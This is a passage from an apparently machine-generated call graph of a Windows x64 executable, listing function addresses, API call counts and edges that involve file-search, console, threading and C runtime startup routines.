38985 7ff6bbcd5d40 237 API calls 38934->38985 38986 7ff6bbcb6114 216 API calls 38934->38986 38987 7ff6bbcd5708 237 API calls 38934->38987 38989 7ff6bbcda250 237 API calls 38934->38989 38990 7ff6bbcc0d60 237 API calls 38934->38990 38991 7ff6bbcdaae0 237 API calls 38934->38991 38935 7ff6bbcba504 208 API calls 38935->38941 38942 7ff6bbcb2d9e 38936->38942 38937 7ff6bbcb80e4 192 API calls 38937->38941 38943 7ff6bbcb2d6c 38938->38943 38939->38933 38940->38934 38941->38935 38941->38937 38946 7ff6bbcd7c7c 127 API calls 38941->38946 38949 7ff6bbcb1168 8 API calls 38941->38949 38960 7ff6bbcb33b4 64 API calls 38941->38960 38962 7ff6bbcb2e39 38941->38962 38965 7ff6bbcb6188 231 API calls 38941->38965 38966 7ff6bbcb3f74 138 API calls 38941->38966 38972 7ff6bbceba9c 195 API calls 38941->38972 38973 7ff6bbcf49f4 48 API calls 38941->38973 38975 7ff6bbcc8444 54 API calls 38941->38975 38945 7ff6bbcc8444 54 API calls 38942->38945 38947 7ff6bbcf49f4 48 API calls 38943->38947 38944->38934 38948 7ff6bbcb2da6 38945->38948 38946->38941 38951 7ff6bbcb2d79 38947->38951 38954 7ff6bbcd1c24 12 API calls 38948->38954 38949->38941 38950->38934 38953 7ff6bbcc8444 54 API calls 38951->38953 38952->38933 38953->38928 38954->38941 38955->38934 38956->38934 38957 7ff6bbcfae50 71 API calls 38957->38962 38958->38934 38959->38934 38960->38941 38961->38934 38962->38941 38962->38957 38963 7ff6bbccca40 61 API calls 38962->38963 38963->38941 38964->38934 38965->38941 38966->38941 38967->38933 38968->38934 38969->38934 38970->38934 38971->38934 38972->38941 38973->38941 38974->38934 38975->38941 38976->38934 38977->38934 38978->38934 38979->38934 38980->38934 38981->38934 38982->38934 38983->38934 38984->38934 38985->38934 38986->38934 38987->38934 38988->38933 38989->38934 38990->38933 38991->38933 38992->38925 38993->38919 38995 7ff6bbce34f6 38994->38995 38996 7ff6bbcb1893 38995->38996 39062 7ff6bbcfdac0 CompareStringW 38995->39062 38996->38866 38996->38874 39001 7ff6bbcb546f setbuf 38998->39001 38999 7ff6bbcb554a memcpy_s 39003 7ff6bbcfc0a8 10 API calls 38999->39003 39001->38999 39012 7ff6bbcb5588 memcpy_s 39001->39012 39002 7ff6bbcb5583 39092 7ff6bbcb6eb8 39002->39092 39005 7ff6bbcb5576 39003->39005 39007 7ff6bbcb681c 54 API calls 39005->39007 39007->39002 39008 7ff6bbcb56e9 39099 7ff6bbcf6f68 39008->39099 39010 7ff6bbcb56f6 39011 7ff6bbd0a610 _handle_error 8 API calls 39010->39011 39013 7ff6bbcb19df 39011->39013 39012->39002 39063 7ff6bbcb3210 39012->39063 39069 7ff6bbcc7088 39012->39069 39073 7ff6bbcb681c 39012->39073 39084 7ff6bbcf7a24 39012->39084 39103 7ff6bbcb571c 39012->39103 39111 7ff6bbcc4380 14 API calls 39012->39111 39018 7ff6bbcb72c4 39013->39018 39019 7ff6bbcb72eb 39018->39019 39238 7ff6bbcc88dc 39019->39238 39021 7ff6bbcb7302 39242 7ff6bbce915c 39021->39242 39023 7ff6bbcb730f 39254 7ff6bbce7044 39023->39254 39026 7ff6bbd0a444 new 4 API calls 39027 7ff6bbcb73e3 39026->39027 39028 7ff6bbcb73f5 memcpy_s 39027->39028 39259 7ff6bbcd894c 39027->39259 39030 7ff6bbcc9be0 14 API calls 39028->39030 39031 7ff6bbcb1a01 39030->39031 39031->38885 39033 7ff6bbcb7539 39032->39033 39285 7ff6bbce922c 39033->39285 39038 7ff6bbcc6d45 39036->39038 39040 7ff6bbcc6cbc 39036->39040 39037 7ff6bbcc6d83 39037->38896 39038->39037 39041 7ff6bbcc6d69 39038->39041 39304 7ff6bbce9f78 8 API calls 2 library calls 39038->39304 39039 7ff6bbcc6cd9 39043 7ff6bbcc6cf3 39039->39043 39300 7ff6bbce9f78 8 API calls 2 library calls 39039->39300 39040->39039 39299 7ff6bbce9f78 8 API calls 2 library calls 39040->39299 39041->39037 39305 7ff6bbce9f78 8 API calls 2 library calls 39041->39305 39046 7ff6bbcc6d0d 39043->39046 39301 7ff6bbce9f78 8 API calls 2 library calls 39043->39301 39049 7ff6bbcc6d2b 39046->39049 39302 7ff6bbce9f78 8 API calls 2 library calls 39046->39302 39049->39037 39303 7ff6bbce9f78 8 API calls 2 library calls 39049->39303 39053 7ff6bbcb7162 39052->39053 39054 7ff6bbcb7167 39052->39054 39306 7ff6bbcb6c64 130 API calls _handle_error 39053->39306 39056->38873 39057->38865 39058->38867 39059->38875 39060->38879 39061->38877 39062->38996 39064 7ff6bbcb3231 39063->39064 39068 7ff6bbcb32e9 39063->39068 39064->39068 39112 7ff6bbcc4380 14 API calls 39064->39112 39066 7ff6bbcb329c 39066->39068 39113 7ff6bbcd2a20 22 API calls 2 library calls 39066->39113 39068->39012 39071 7ff6bbcc70a4 39069->39071 39070 7ff6bbcc70c5 39070->39012 39071->39070 39114 7ff6bbcd8558 10 API calls 2 library calls 39071->39114 39115 7ff6bbcb6714 39073->39115 39075 7ff6bbcb6836 39076 7ff6bbcb6853 39075->39076 39126 7ff6bbd148c0 39075->39126 39076->39012 39079 7ff6bbcb68a9 std::bad_alloc::bad_alloc 39134 7ff6bbd0ba34 RtlPcToFileHeader RaiseException 39079->39134 39081 7ff6bbcb68c4 39135 7ff6bbcb7188 12 API calls 39081->39135 39083 7ff6bbcb68eb 39083->39012 39088 7ff6bbcf7a59 39084->39088 39090 7ff6bbcf7a4f 39084->39090 39085 7ff6bbcf7a7c 39174 7ff6bbcfb6d0 73 API calls _Init_thread_footer 39085->39174 39088->39085 39089 7ff6bbcf7b1c 60 API calls 39088->39089 39088->39090 39142 7ff6bbcf71fc 39088->39142 39175 7ff6bbcc41b0 14 API calls 2 library calls 39088->39175 39089->39088 39090->39012 39093 7ff6bbcb6ee6 39092->39093 39098 7ff6bbcb6f5c 39092->39098 39231 7ff6bbcf9f64 8 API calls __BuildCatchObjectHelper 39093->39231 39095 7ff6bbcb6efb 39096 7ff6bbcb6f2f 39095->39096 39095->39098 39096->39095 39232 7ff6bbcb7188 12 API calls 39096->39232 39098->39008 39100 7ff6bbcf6fb4 39099->39100 39102 7ff6bbcf6f8a 39099->39102 39101 7ff6bbcd4538 FindClose 39101->39102 39102->39100 39102->39101 39104 7ff6bbcb5742 39103->39104 39108 7ff6bbcb575d 39103->39108 39104->39108 39237 7ff6bbce3520 12 API calls 2 library calls 39104->39237 39233 7ff6bbce3610 39108->39233 39109 7ff6bbcb57fc 39109->39012 39110 7ff6bbce48bc 8 API calls 39110->39109 39111->39012 39112->39066 39113->39068 39114->39071 39117 7ff6bbcb6738 39115->39117 39125 7ff6bbcb67a7 __BuildCatchObjectHelper 39115->39125 39116 7ff6bbcb6765 39121 7ff6bbcb67e1 39116->39121 39122 7ff6bbcb6786 39116->39122 39117->39116 39136 7ff6bbccca6c 48 API calls 2 library calls 39117->39136 39119 7ff6bbcb6759 39137 7ff6bbcccb64 8 API calls 39119->39137 39121->39125 39139 7ff6bbcccb64 8 API calls 39121->39139 39122->39125 39138 7ff6bbcccb64 8 API calls 39122->39138 39125->39075 39127 7ff6bbcb684b 39126->39127 39128 7ff6bbd148f5 39126->39128 39127->39076 39127->39079 39128->39127 39140 7ff6bbd17094 31 API calls 2 library calls 39128->39140 39130 7ff6bbd14924 39130->39127 39131 7ff6bbd1492d 39130->39131 39141 7ff6bbd14e3c 16 API calls abort 39131->39141 39134->39081 39135->39083 39136->39119 39140->39130 39147 7ff6bbcf7217 setbuf 39142->39147 39143 7ff6bbd0a610 _handle_error 8 API calls 39145 7ff6bbcf776f 39143->39145 39145->39088 39158 7ff6bbcf729c 39147->39158 39167 7ff6bbcf725a 39147->39167 39171 7ff6bbcf73c5 39147->39171 39189 7ff6bbcd4554 39147->39189 39148 7ff6bbcf7453 39149 7ff6bbcf7464 39148->39149 39150 7ff6bbcf7476 39148->39150 39197 7ff6bbcf7c38 55 API calls 3 library calls 39149->39197 39170 7ff6bbcf7496 39150->39170 39186 7ff6bbcd4538 39150->39186 39152 7ff6bbcf76ef 39152->39167 39200 7ff6bbcd8558 10 API calls 2 library calls 39152->39200 39154 7ff6bbcf7471 39154->39150 39157 7ff6bbcf7342 39157->39152 39166 7ff6bbcf7656 39157->39166 39157->39167 39198 7ff6bbcc4380 14 API calls 39157->39198 39160 7ff6bbcf73bb 39158->39160 39161 7ff6bbcf732e 39158->39161 39176 7ff6bbd0a444 39160->39176 39161->39157 39163 7ff6bbcf734a 39161->39163 39165 7ff6bbcf737e 39163->39165 39163->39167 39195 7ff6bbcc4380 14 API calls 39163->39195 39164 7ff6bbcd4554 16 API calls 39164->39167 39165->39167 39196 7ff6bbcccbd0 75 API calls 39165->39196 39166->39152 39166->39167 39172 7ff6bbcf7723 39166->39172 39167->39143 39170->39164 39170->39167 39182 7ff6bbcd45cc 39171->39182 39199 7ff6bbcbc214 8 API calls 2 library calls 39172->39199 39175->39088 39181 7ff6bbd0a44f 39176->39181 39177 7ff6bbd0a47a 39177->39171 39178 7ff6bbd136c0 new 2 API calls 39178->39181 39181->39177 39181->39178 39201 7ff6bbd0b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39181->39201 39202 7ff6bbd0b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 39181->39202 39184 7ff6bbcd45ed 39182->39184 39183 7ff6bbcd46ec 15 API calls 39183->39184 39184->39183 39185 7ff6bbcd46b2 39184->39185 39185->39148 39185->39157 39187 7ff6bbcd454f 39186->39187 39188 7ff6bbcd4549 FindClose 39186->39188 39187->39170 39188->39187 39190 7ff6bbcd4570 39189->39190 39194 7ff6bbcd4574 39190->39194 39203 7ff6bbcd46ec 39190->39203 39193 7ff6bbcd458d FindClose 39193->39194 39194->39158 39195->39165 39196->39167 39197->39154 39198->39166 39199->39167 39200->39167 39204 7ff6bbcd4705 setbuf 39203->39204 39205 7ff6bbcd4733 FindFirstFileW 39204->39205 39206 7ff6bbcd47a4 FindNextFileW 39204->39206 39207 7ff6bbcd4749 39205->39207 39215 7ff6bbcd478b 39205->39215 39208 7ff6bbcd47ae GetLastError 39206->39208 39206->39215 39216 7ff6bbce4534 39207->39216 39208->39215 39211 7ff6bbd0a610 _handle_error 8 API calls 39214 7ff6bbcd4587 39211->39214 39212 7ff6bbcd475f FindFirstFileW 39213 7ff6bbcd477a GetLastError 39212->39213 39212->39215 39213->39215 39214->39193 39214->39194 39215->39211 39217 7ff6bbce4549 setbuf 39216->39217 39227 7ff6bbce45a2 39217->39227 39228 7ff6bbce472c CharUpperW 39217->39228 39219 7ff6bbce4579 39229 7ff6bbce4760 CharUpperW 39219->39229 39220 7ff6bbd0a610 _handle_error 8 API calls 39221 7ff6bbcd475b 39220->39221 39221->39212 39221->39213 39223 7ff6bbce4592 39224 7ff6bbce459a 39223->39224 39225 7ff6bbce4629 GetCurrentDirectoryW 39223->39225 39230 7ff6bbce472c CharUpperW 39224->39230 39225->39227 39227->39220 39228->39219 39229->39223 39230->39227 39231->39095 39232->39096 39235 7ff6bbce3626 setbuf wcschr 39233->39235 39234 7ff6bbd0a610 _handle_error 8 API calls 39236 7ff6bbcb57e1 39234->39236 39235->39234 39236->39109 39236->39110 39237->39108 39239 7ff6bbcc8919 39238->39239 39264 7ff6bbcf4b14 39239->39264 39241 7ff6bbcc8954 memcpy_s 39241->39021 39243 7ff6bbce9199 39242->39243 39244 7ff6bbd0a480 4 API calls 39243->39244 39245 7ff6bbce91be 39244->39245 39246 7ff6bbd0a444 new 4 API calls 39245->39246 39247 7ff6bbce91cf 39246->39247 39248 7ff6bbce91e1 39247->39248 39249 7ff6bbcc88dc 8 API calls 39247->39249 39250 7ff6bbd0a444 new 4 API calls 39248->39250 39249->39248 39251 7ff6bbce91f7 39250->39251 39252 7ff6bbce9209 39251->39252 39253 7ff6bbcc88dc 8 API calls 39251->39253 39252->39023 39253->39252 39255 7ff6bbcc88dc 8 API calls 39254->39255 39256 7ff6bbce7063 39255->39256 39257 7ff6bbce72c0 4 API calls 39256->39257 39258 7ff6bbcb7325 39257->39258 39258->39026 39258->39028 39269 7ff6bbcf7d80 39259->39269 39265 7ff6bbcf4b2b 39264->39265 39266 7ff6bbcf4b26 39264->39266 39265->39241 39268 7ff6bbcf4b38 8 API calls _handle_error 39266->39268 39268->39265 39276 7ff6bbcf8094 39269->39276 39272 7ff6bbcd8a44 39273 7ff6bbcd8a5a memcpy_s 39272->39273 39280 7ff6bbcfbac4 39273->39280 39277 7ff6bbcf809f 39276->39277 39278 7ff6bbcf7ec8 68 API calls 39277->39278 39279 7ff6bbcd896e 39278->39279 39279->39272 39283 7ff6bbcfba70 GetCurrentProcess GetProcessAffinityMask 39280->39283 39284 7ff6bbcd89c5 39283->39284 39284->39028 39286 7ff6bbce9245 39285->39286 39293 7ff6bbcd6194 39286->39293 39288 7ff6bbce92b1 39289 7ff6bbcd6194 72 API calls 39288->39289 39290 7ff6bbce92bd 39289->39290 39291 7ff6bbcd6194 72 API calls 39290->39291 39292 7ff6bbce92c9 39291->39292 39294 7ff6bbcd61b4 39293->39294 39297 7ff6bbcd61cb 39293->39297 39298 7ff6bbcfb850 72 API calls 39294->39298 39297->39288 39299->39039 39300->39043 39301->39046 39302->39049 39303->39038 39304->39041 39305->39037 39306->39054 39307 7ff6bbcfbb70 39310 7ff6bbcfbb80 39307->39310 39319 7ff6bbcfbae8 39310->39319 39312 7ff6bbcfbb79 39313 7ff6bbcfbb97 39313->39312 39324 7ff6bbcc1690 39313->39324 39315 7ff6bbcfbbd5 LeaveCriticalSection 39317 7ff6bbcfbae8 67 API calls 39315->39317 39316 7ff6bbcfbbc8 SetEvent 39316->39315 39317->39313 39328 7ff6bbcfb974 WaitForSingleObject 39319->39328 39322 7ff6bbcfbb12 39322->39313 39323 7ff6bbcfbb16 EnterCriticalSection LeaveCriticalSection 39323->39322 39325 7ff6bbcc16a4 39324->39325 39326 7ff6bbcc16c2 EnterCriticalSection 39324->39326 39325->39326 39336 7ff6bbcc1180 39325->39336 39326->39315 39326->39316 39329 7ff6bbcfb9b7 39328->39329 39330 7ff6bbcfb986 GetLastError 39328->39330 39329->39322 39329->39323 39334 7ff6bbccca6c 48 API calls 2 library calls 39330->39334 39332 7ff6bbcfb9a6 39335 7ff6bbccca40 61 API calls _CxxThrowException 39332->39335 39334->39332 39335->39329 39337 7ff6bbcc11ab 39336->39337 39345 7ff6bbcc11b0 39336->39345 39346 7ff6bbcc17c8 216 API calls 2 library calls 39337->39346 39339 7ff6bbcc166a 39339->39325 39340 7ff6bbce6fe8 216 API calls 39340->39345 39341 7ff6bbce6d38 216 API calls 39341->39345 39342 7ff6bbce6e90 216 API calls 39342->39345 39343 7ff6bbcc1080 48 API calls 39343->39345 39345->39339 39345->39340 39345->39341 39345->39342 39345->39343 39347 7ff6bbcc17c8 216 API calls 2 library calls 39345->39347 39346->39345 39347->39345 39348 7ff6bbd1231c 39349 7ff6bbd1238c 39348->39349 39350 7ff6bbd12342 GetModuleHandleW 39348->39350 39361 7ff6bbd16938 EnterCriticalSection 39349->39361 39350->39349 39354 7ff6bbd1234f 39350->39354 39352 7ff6bbd16998 abort LeaveCriticalSection 39353 7ff6bbd12460 39352->39353 39356 7ff6bbd1246c 39353->39356 39360 7ff6bbd12488 11 API calls 39353->39360 39354->39349 39362 7ff6bbd124d4 GetModuleHandleExW 39354->39362 39355 7ff6bbd12410 39355->39352 39357 7ff6bbd12396 39357->39355 39358 7ff6bbd143b8 16 API calls 39357->39358 39358->39355 39360->39356 39363 7ff6bbd124fe GetProcAddress 39362->39363 39364 7ff6bbd12525 39362->39364 39363->39364 39365 7ff6bbd12518 39363->39365 39366 7ff6bbd1252f FreeLibrary 39364->39366 39367 7ff6bbd12535 39364->39367 39365->39364 39366->39367 39367->39349 39368 7ff6bbd0b0fc 39387 7ff6bbd0aa8c 39368->39387 39372 7ff6bbd0b148 39377 7ff6bbd0b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39372->39377 39395 7ff6bbd1472c 39372->39395 39373 7ff6bbd0b123 __scrt_acquire_startup_lock 39373->39372 39443 7ff6bbd0b52c 7 API calls memcpy_s 39373->39443 39376 7ff6bbd0b16d 39377->39376 39378 7ff6bbd0b1f7 39377->39378 39444 7ff6bbd12574 35 API calls __FrameUnwindToState 39377->39444 39399 7ff6bbd13fc4 39378->39399 39386 7ff6bbd0b220 39445 7ff6bbd0ac64 8 API calls 2 library calls 39386->39445 39388 7ff6bbd0aaae __isa_available_init 39387->39388 39446 7ff6bbd0e2f8 39388->39446 39391 7ff6bbd0aab7 39391->39373 39442 7ff6bbd0b52c 7 API calls memcpy_s 39391->39442 39397 7ff6bbd14744 39395->39397 39396 7ff6bbd14766 39396->39377 39397->39396 39495 7ff6bbd0b010 39397->39495 39400 7ff6bbd0b20c 39399->39400 39401 7ff6bbd13fd4 39399->39401 39403 7ff6bbce7e20 39400->39403 39587 7ff6bbd13c84 39401->39587 39627 7ff6bbcfb470 GetModuleHandleW 39403->39627 39409 7ff6bbce7e58 SetErrorMode GetModuleHandleW 39410 7ff6bbcf48cc 21 API calls 39409->39410 39411 7ff6bbce7e7d 39410->39411 39412 7ff6bbcf3e48 137 API calls 39411->39412 39413 7ff6bbce7e90 39412->39413 39414 7ff6bbcc3d3c 126 API calls 39413->39414 39415 7ff6bbce7e9c 39414->39415 39416 7ff6bbd0a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39415->39416 39417 7ff6bbce7ead 39416->39417 39418 7ff6bbce7ebf 39417->39418 39419 7ff6bbcc3f18 70 API calls 39417->39419 39420 7ff6bbcc4d1c 157 API calls 39418->39420 39419->39418 39421 7ff6bbce7ed6 39420->39421 39422 7ff6bbce7eef 39421->39422 39423 7ff6bbcc6ad0 154 API calls 39421->39423 39424 7ff6bbcc4d1c 157 API calls 39422->39424 39425 7ff6bbce7ee7 39423->39425 39426 7ff6bbce7eff 39424->39426 39427 7ff6bbcc4e48 160 API calls 39425->39427 39428 7ff6bbce7f0d 39426->39428 39430 7ff6bbce7f14 39426->39430 39427->39422 39429 7ff6bbcfb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39428->39429 39429->39430 39431 7ff6bbcc4888 58 API calls 39430->39431 39432 7ff6bbce7f57 39431->39432 39433 7ff6bbcc4fd0 268 API calls 39432->39433 39434 7ff6bbce7f5f 39433->39434 39435 7ff6bbce7f9e 39434->39435 39436 7ff6bbce7f8c 39434->39436 39440 7ff6bbd0b684 GetModuleHandleW 39435->39440 39437 7ff6bbcfb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39436->39437 39438 7ff6bbce7f93 39437->39438 39438->39435 39439 7ff6bbcfb57c 14 API calls 39438->39439 39439->39435 39441 7ff6bbd0b698 39440->39441 39441->39386 39442->39373 39443->39372 39444->39378 39445->39376 39447 7ff6bbd0e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39446->39447 39459 7ff6bbd0eb08 39447->39459 39450 7ff6bbd0aab3 39450->39391 39454 7ff6bbd145e4 39450->39454 39452 7ff6bbd0e318 39452->39450 39466 7ff6bbd0eb50 DeleteCriticalSection 39452->39466 39456 7ff6bbd19d4c 39454->39456 39455 7ff6bbd0aac0 39455->39391 39458 7ff6bbd0e32c 8 API calls 3 library calls 39455->39458 39456->39455 39483 7ff6bbd166c0 39456->39483 39458->39391 39460 7ff6bbd0eb10 39459->39460 39462 7ff6bbd0eb41 39460->39462 39464 7ff6bbd0e30b 39460->39464 39467 7ff6bbd0e678 39460->39467 39472 7ff6bbd0eb50 DeleteCriticalSection 39462->39472 39464->39450 39465 7ff6bbd0e8a4 8 API calls 3 library calls 39464->39465 39465->39452 39466->39450 39473 7ff6bbd0e34c 39467->39473 39470 7ff6bbd0e6cf InitializeCriticalSectionAndSpinCount 39471 7ff6bbd0e6bb 39470->39471 39471->39460 39472->39464 39474 7ff6bbd0e3b2 39473->39474 39478 7ff6bbd0e3ad 39473->39478 39474->39470 39474->39471 39475 7ff6bbd0e47a 39475->39474 39477 7ff6bbd0e489 GetProcAddress 39475->39477 39476 7ff6bbd0e3e5 LoadLibraryExW 39476->39478 39479 7ff6bbd0e40b GetLastError 39476->39479 39477->39474 39480 7ff6bbd0e4a1 39477->39480 39478->39474 39478->39475 39478->39476 39482 7ff6bbd0e458 FreeLibrary 39478->39482 39479->39478 39481 7ff6bbd0e416 LoadLibraryExW 39479->39481 39480->39474 39481->39478 39482->39478 39494 7ff6bbd16938 EnterCriticalSection 39483->39494 39485 7ff6bbd166d0 39486 7ff6bbd18050 32 API calls 39485->39486 39487 7ff6bbd166d9 39486->39487 39488 7ff6bbd164d0 34 API calls 39487->39488 39493 7ff6bbd166e7 39487->39493 39490 7ff6bbd166e2 39488->39490 39489 7ff6bbd16998 abort LeaveCriticalSection 39491 7ff6bbd166f3 39489->39491 39492 7ff6bbd165bc GetStdHandle GetFileType 39490->39492 39491->39456 39492->39493 39493->39489 39496 7ff6bbd0b020 pre_c_initialization 39495->39496 39516 7ff6bbd12b00 39496->39516 39498 7ff6bbd0b02c pre_c_initialization 39522 7ff6bbd0aad8 39498->39522 39500 7ff6bbd0b045 39501 7ff6bbd0b049 _RTC_Initialize 39500->39501 39502 7ff6bbd0b0b5 39500->39502 39527 7ff6bbd0ace0 39501->39527 39559 7ff6bbd0b52c 7 API calls memcpy_s 39502->39559 39504 7ff6bbd0b0bf 39560 7ff6bbd0b52c 7 API calls memcpy_s 39504->39560 39506 7ff6bbd0b05a pre_c_initialization 39530 7ff6bbd13b0c 39506->39530 39508 7ff6bbd0b0ca __scrt_initialize_default_local_stdio_options 39508->39397 39511 7ff6bbd0b06a 39558 7ff6bbd0b7dc RtlInitializeSListHead 39511->39558 39513 7ff6bbd0b06f __CxxCallCatchBlock pre_c_initialization 39514 7ff6bbd14818 pre_c_initialization 35 API calls 39513->39514 39515 7ff6bbd0b09a pre_c_initialization 39514->39515 39515->39397 39517 7ff6bbd12b11 39516->39517 39521 7ff6bbd12b19 39517->39521 39561 7ff6bbd14f3c 15 API calls abort 39517->39561 39519 7ff6bbd12b28 39562 7ff6bbd14e1c 31 API calls _invalid_parameter_noinfo 39519->39562 39521->39498 39523 7ff6bbd0ab96 39522->39523 39526 7ff6bbd0aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 39522->39526 39563 7ff6bbd0b52c 7 API calls memcpy_s 39523->39563 39525 7ff6bbd0aba0 39526->39500 39564 7ff6bbd0ac90 39527->39564 39529 7ff6bbd0ace9 39529->39506 39531 7ff6bbd13b2a 39530->39531 39532 7ff6bbd13b40 39530->39532 39569 7ff6bbd14f3c 15 API calls abort 39531->39569 39571 7ff6bbd19370 39532->39571 39536 7ff6bbd13b2f 39570 7ff6bbd14e1c 31 API calls _invalid_parameter_noinfo 39536->39570 39537 7ff6bbd13b72 39575 7ff6bbd138ec 35 API calls pre_c_initialization 39537->39575 39539 7ff6bbd0b066 39539->39504 39539->39511 39541 7ff6bbd13b9c 39576 7ff6bbd13aa8 15 API calls 2 library calls 39541->39576 39543 7ff6bbd13bb2 39544 7ff6bbd13bba 39543->39544 39545 7ff6bbd13bcb 39543->39545 39577 7ff6bbd14f3c 15 API calls abort 39544->39577 39578 7ff6bbd138ec 35 API calls pre_c_initialization 39545->39578 39548 7ff6bbd13be7 39550 7ff6bbd13c17 39548->39550 39551 7ff6bbd13c30 39548->39551 39556 7ff6bbd13bbf 39548->39556 39549 7ff6bbd14a74 __free_lconv_num 15 API calls 39549->39539 39579 7ff6bbd14a74 39550->39579 39554 7ff6bbd14a74 __free_lconv_num 15 API calls 39551->39554 39553 7ff6bbd13c20 39555 7ff6bbd14a74 __free_lconv_num 15 API calls 39553->39555 39554->39556 39557 7ff6bbd13c2c 39555->39557 39556->39549 39557->39539 39559->39504 39560->39508 39561->39519 39562->39521 39563->39525 39565 7ff6bbd0acbf 39564->39565 39566 7ff6bbd0acb5 _onexit 39564->39566 39568 7ff6bbd14434 34 API calls _onexit 39565->39568 39566->39529 39568->39566 39569->39536 39570->39539 39572 7ff6bbd1937d 39571->39572 39573 7ff6bbd13b45 GetModuleFileNameA 39571->39573 39585 7ff6bbd191b0 48 API calls 4 library calls 39572->39585 39573->39537 39575->39541 39576->39543 39577->39556 39578->39548 39580 7ff6bbd14a79 RtlFreeHeap 39579->39580 39581 7ff6bbd14aa9 __free_lconv_num 39579->39581 39580->39581 39582 7ff6bbd14a94 39580->39582 39581->39553 39586 7ff6bbd14f3c 15 API calls abort 39582->39586 39584 7ff6bbd14a99 GetLastError 39584->39581 39585->39573 39586->39584 39588 7ff6bbd13c98 39587->39588 39589 7ff6bbd13ca1 39587->39589 39588->39589 39593 7ff6bbd13ccc 39588->39593 39589->39400 39594 7ff6bbd13caa 39593->39594 39595 7ff6bbd13ce5 39593->39595 39594->39589 39605 7ff6bbd13e78 17 API calls 2 library calls 39594->39605 39596 7ff6bbd19370 pre_c_initialization 48 API calls 39595->39596 39597 7ff6bbd13cea 39596->39597 39606 7ff6bbd1978c GetEnvironmentStringsW 39597->39606 39600 7ff6bbd13cf7 39603 7ff6bbd14a74 __free_lconv_num 15 API calls 39600->39603 39602 7ff6bbd13d04 39604 7ff6bbd14a74 __free_lconv_num 15 API calls 39602->39604 39603->39594 39604->39600 39605->39589 39607 7ff6bbd197ba WideCharToMultiByte 39606->39607 39608 7ff6bbd1985e 39606->39608 39607->39608 39610 7ff6bbd19814 39607->39610 39611 7ff6bbd19868 FreeEnvironmentStringsW 39608->39611 39612 7ff6bbd13cef 39608->39612 39619 7ff6bbd14ab4 39610->39619 39611->39612 39612->39600 39618 7ff6bbd13d38 31 API calls 4 library calls 39612->39618 39615 7ff6bbd1984b 39617 7ff6bbd14a74 __free_lconv_num 15 API calls 39615->39617 39616 7ff6bbd19824 WideCharToMultiByte 39616->39615 39617->39608 39618->39602 39620 7ff6bbd14aff 39619->39620 39624 7ff6bbd14ac3 __vcrt_getptd_noexit 39619->39624 39626 7ff6bbd14f3c 15 API calls abort 39620->39626 39622 7ff6bbd14ae6 RtlAllocateHeap 39623 7ff6bbd14afd 39622->39623 39622->39624 39623->39615 39623->39616 39624->39620 39624->39622 39625 7ff6bbd136c0 new 2 API calls 39624->39625 39625->39624 39626->39623 39628 7ff6bbce7e45 39627->39628 39629 7ff6bbcfb496 GetProcAddress 39627->39629 39632 7ff6bbcc7a68 39628->39632 39630 7ff6bbcfb4ae 39629->39630 39631 7ff6bbcfb4cb GetProcAddress 39629->39631 39630->39631 39631->39628 39633 7ff6bbcc7a76 39632->39633 39653 7ff6bbd12ae4 39633->39653 39635 7ff6bbcc7a80 39636 7ff6bbd12ae4 setbuf 60 API calls 39635->39636 39637 7ff6bbcc7a94 39636->39637 39662 7ff6bbcc7b44 GetStdHandle GetFileType 39637->39662 39640 7ff6bbcc7b44 3 API calls 39641 7ff6bbcc7aae 39640->39641 39642 7ff6bbcc7b44 3 API calls 39641->39642 39644 7ff6bbcc7abe 39642->39644 39643 7ff6bbcc7b12 39652 7ff6bbcccd78 SetConsoleCtrlHandler 39643->39652 39646 7ff6bbcc7aeb 39644->39646 39665 7ff6bbd12abc 31 API calls 2 library calls 39644->39665 39646->39643 39667 7ff6bbd12abc 31 API calls 2 library calls 39646->39667 39647 7ff6bbcc7adf 39666 7ff6bbd12b40 33 API calls 2 library calls 39647->39666 39650 7ff6bbcc7b06 39668 7ff6bbd12b40 33 API calls 2 library calls 39650->39668 39654 7ff6bbd12ae9 39653->39654 39655 7ff6bbd17ee8 39654->39655 39658 7ff6bbd17f23 39654->39658 39669 7ff6bbd14f3c 15 API calls abort 39655->39669 39657 7ff6bbd17eed 39670 7ff6bbd14e1c 31 API calls _invalid_parameter_noinfo 39657->39670 39671 7ff6bbd17d98 60 API calls 2 library calls 39658->39671 39661 7ff6bbd17ef8 39661->39635 39663 7ff6bbcc7b61 GetConsoleMode 39662->39663 39664 7ff6bbcc7a9e 39662->39664 39663->39664 39664->39640 39665->39647 39666->39646 39667->39650 39668->39643 39669->39657 39670->39661 39671->39661 39672 7ff6bbcb3b53 39673 7ff6bbcb3b64 39672->39673 39723 7ff6bbcd1e80 39673->39723 39674 7ff6bbcb3c09 39735 7ff6bbcd23f0 39674->39735 39676 7ff6bbcb3c18 39740 7ff6bbcb8050 157 API calls 39676->39740 39677 7ff6bbcb3bb6 39677->39674 39677->39676 39678 7ff6bbcb3c01 39677->39678 39681 7ff6bbcd1c24 12 API calls 39678->39681 39680 7ff6bbcb3c3d 39741 7ff6bbcb8010 13 API calls 39680->39741 39681->39674 39683 7ff6bbcb3ccc 39704 7ff6bbcb3c90 39683->39704 39748 7ff6bbcd2414 61 API calls 39683->39748 39684 7ff6bbcb3c45 39687 7ff6bbcb3c54 39684->39687 39742 7ff6bbcccba8 75 API calls 39684->39742 39743 7ff6bbcba9d4 186 API calls wcschr 39687->39743 39688 7ff6bbcb3cf9 39749 7ff6bbcd1998 138 API calls 39688->39749 39692 7ff6bbcb3c5c 39744 7ff6bbcb93ac 8 API calls 39692->39744 39693 7ff6bbcb3d10 39695 7ff6bbcd18ac 15 API calls 39693->39695 39695->39704 39696 7ff6bbcb3c66 39698 7ff6bbcb3c77 39696->39698 39745 7ff6bbccca40 61 API calls _CxxThrowException 39696->39745 39746 7ff6bbcb8090 8 API calls 39698->39746 39701 7ff6bbcb3c7f 39701->39704 39747 7ff6bbccca40 61 API calls _CxxThrowException 39701->39747 39750 7ff6bbcfd400 48 API calls 39704->39750 39724 7ff6bbcd1e95 setbuf 39723->39724 39725 